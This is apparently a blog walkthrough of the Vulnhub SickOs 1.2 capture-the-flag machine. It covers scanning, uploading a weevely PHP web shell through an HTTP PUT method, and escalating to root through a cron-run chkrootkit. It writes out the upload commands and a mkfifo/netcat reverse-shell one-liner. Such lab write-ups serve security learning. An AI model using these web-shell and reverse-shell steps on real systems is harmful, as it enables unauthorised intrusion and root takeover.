Vulnhub SICK0S1.2 Walkthrough

We setup the host and then start scanning it using nmap :

nmap –A –T4 –p- –vv

Only two ports are open 22,80

Lets start scanning with dirb for directory listing and nikto for more iinformation:

Dirb and nikto showing a /test directory … so i used curl options the page came with a result ( i used curl on the main page but nothing came up) .. but now we can see that the page came with PUT options wich means we can upload a shell script to gain access

upload a malicious file using weevely ( weevely is great and i use it alot )

weevely generate 123456 shell.php

nmap -p 80 –script http-put –script-args http-put.url=’/test/shell.php’,http-put.file=’/root/ shell.php’

Running weevely with weevely

and we got a shell

I spent some time with privilege escalation till I found a crontab job using the ls -al /etc/cron* command and then I noticed a file (chkrootkit)

This file chkrootkit is a vulnerability to privilege escalation

the exploit-db post about this privilege escalation exploit, “If an attacker knows you are periodically running chkrootkit (like in cron.daily) and has write access to /tmp (not mounted noexec), he may easily take advantage of this.”

We need to write the following as described in the exploit file to gain root privilege : ( tried a lot of scripts but this one worked for me )

echo ‘#!/bin/bash’ > update

echo ‘rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 443 >/tmp/f’ >> update

chmod 777 update

And we root … viewing the 7d03aaa2bf93d80040f3f22ec6ad9d5a.txt showed us that we successfully completed the task.

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s